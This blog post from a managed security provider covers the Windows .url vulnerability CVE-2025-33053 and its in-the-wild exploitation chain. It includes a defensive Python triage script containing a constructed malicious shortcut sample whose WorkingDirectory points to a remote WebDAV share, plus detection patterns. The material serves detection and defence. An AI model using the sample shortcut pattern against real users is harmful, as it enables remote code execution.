Week 24 – Critical vulnerability in Windows is fixed on Patch Tuesday

09 – 15 June 2025
After our last CVE of the Week post exploring a critical vulnerability in the open source landscape, we are back again in the Microsoft ecosystem, as it’s just past Patch Tuesday, which keeps on giving (and more importantly, fixing) weaknesses in Windows.
Probably the most interesting item on the long list of fixed security bugs is CVE-2025-33053, an unauthenticated Remote Code Execution vulnerability. It exploits the fact that Windows does not properly validate the WorkingDirectory field in Internet Shortcuts, or as most of us know them, .url files.
Unfortunately, the attack has been in the wild for many months now as a zero day, with the first malware sample identified by Check Point’s researchers back in March.
Without diving deep into the technical details: the kill chain begins with a phishing mail carrying a maliciously crafted .url file, which launches iediagcmd.exe, a legitimate Windows tool that collects diagnostic information for Internet Explorer. This diagnostic tool in turn calls other valid executables such as ipconfig.exe, netsh.exe and route.exe. However, there’s a twist: the tool’s working directory can be set in the .url file, and it is even allowed to point to a remote WebDAV share! This means an attacker can host their own malware on a network share, simply name it route.exe, and it will be executed once the targeted user clicks on the crafted shortcut.
The threat actors, who are associated with the Stealth Falcon APT group, did not stop at this point. They continued to deliver advanced payloads after the initial access, utilizing defense evasion, anti-debugging and obfuscation techniques. The final result is full control over the victim’s machine, allowing the attackers to exfiltrate data, send commands, inject shellcode into running processes and basically do whatever they want, all happening in the background while the victim is reading a bait PDF document.
For those interested in going down the rabbit hole, we are sharing a link to Check Point’s excellent writeup, which is definitely worth a read if you want to learn more about this sophisticated threat. It’s also a useful resource for blue teamers, as it shares valuable IoCs to help defend your networks.
Furthermore, the usual security best practices apply as always: patch as soon as possible, investigate past emails with suspicious (especially .url) attachments and educate users to avoid clicking on attachments before verifying that they came from a trusted source.
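To make the "investigate past emails with suspicious .url attachments" advice concrete, here is an added triage script (our example for this post, not code from Check Point or Microsoft). It parses the INI-style body of an Internet Shortcut and flags the two traits the kill chain above relies on: a WorkingDirectory that points somewhere remote (a UNC path, including the Windows WebDAV redirector forms \\host@80\share and \\host@SSL\share, or an http(s) URL), and a URL field that launches a local executable instead of opening a web address. The two sample shortcuts, the host 203.0.113.10 and the share name are constructed for the demonstration and are not indicators from the real campaign; the "local executable" check is a hypothetical heuristic of ours, not something the advisory prescribes.

```python
r"""Triage Internet Shortcut (.url) attachments for the CVE-2025-33053 pattern.

Added example (not Check Point's or Microsoft's code). Flags a remote
WorkingDirectory (UNC / WebDAV redirector syntax \\host@80\share, \\host@SSL\share,
or an http(s) URL) and a URL field that launches a local .exe. All sample
values below are constructed, not real indicators of compromise.
"""
import re
from dataclasses import dataclass, field

# \\host\... with any host spelling, including the WebDAV forms host@80 / host@SSL.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
HTTP_RE = re.compile(r"^https?://", re.IGNORECASE)
# file:///C:/... or a bare drive path such as C:\... (our own heuristic).
LOCAL_PATH_RE = re.compile(r"^(file:|[a-z]:[\\/])", re.IGNORECASE)


@dataclass
class Triage:
    url: str = ""
    working_directory: str = ""
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_url_file(text: str) -> dict:
    """Parse a .url body into {section: {key: value}}.

    Section and key names are lower-cased because Windows treats them
    case-insensitively; a UTF-8 BOM and CRLF line endings are tolerated.
    """
    sections: dict = {}
    current = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def is_remote_path(value: str) -> bool:
    """True for UNC paths (plain SMB or WebDAV redirector syntax) and http(s) URLs."""
    return bool(UNC_RE.match(value) or HTTP_RE.match(value))


def launches_local_executable(url: str) -> bool:
    """True when the URL field points at a local .exe rather than a web address."""
    return bool(LOCAL_PATH_RE.match(url)) and url.lower().rstrip("/").endswith(".exe")


def triage_url_file(text: str) -> Triage:
    """Apply both heuristics to one .url body and return the findings."""
    shortcut = parse_url_file(text).get("internetshortcut", {})
    result = Triage(url=shortcut.get("url", ""),
                    working_directory=shortcut.get("workingdirectory", ""))
    if result.working_directory and is_remote_path(result.working_directory):
        result.findings.append("remote-workingdirectory")
    if launches_local_executable(result.url):
        result.findings.append("url-launches-local-executable")
    return result


def triage_many(files: dict) -> dict:
    """Triage a {name: body} mapping (e.g. extracted mail attachments) -> {name: findings}."""
    return {name: triage_url_file(body).findings for name, body in files.items()}


# Constructed samples: a normal web shortcut and one shaped like the kill chain in the post.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
SUSPICIOUS_URL_FILE = (
    "\ufeff[InternetShortcut]\r\n"
    "URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe\r\n"
    "WorkingDirectory=\\\\203.0.113.10@80\\share\r\n"
)

if __name__ == "__main__":
    samples = {"benign.url": BENIGN_URL_FILE, "invoice.url": SUSPICIOUS_URL_FILE}
    for name, findings in triage_many(samples).items():
        print(f"{name}: {'SUSPICIOUS ' + ', '.join(findings) if findings else 'clean'}")
```

Point triage_many at the bodies of .url attachments pulled from your mail archive; any hit on remote-workingdirectory deserves a look at proxy and WebDAV client logs for the host named in that path, since a legitimate shortcut has no reason to set its working directory on a remote share.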
Check Point research: https://research.checkpoint.com/2025/stealth-falcon-zero-day/
Official advisory: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053
CVE details by NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-33053

White Hat IT Security is a Europe-based Managed Security Services Provider (MSSP) and proud Microsoft Solution Partner. Its Microsoft-verified managed security solutions (MXDR) reflect the company’s deep expertise and commitment to excellence in cybersecurity. The company was awarded the Partner of the Year Hungary Award by Microsoft in 2024.
With the largest incident response capacity in the CEE region, they’re trusted by organizations to deliver fast, effective, and proactive protection. Their portfolio includes penetration testing, vulnerability assessments, managed Cyber Threat Intelligence, as well as Governance, Risk and Compliance (GRC) consulting and specialized security training.
They are committed to supporting professional initiatives that aim to raise cybersecurity awareness and maturity—both for individuals and organizations. They regularly contribute to the community through knowledge sharing, education, and outreach, helping to build a safer digital future for all.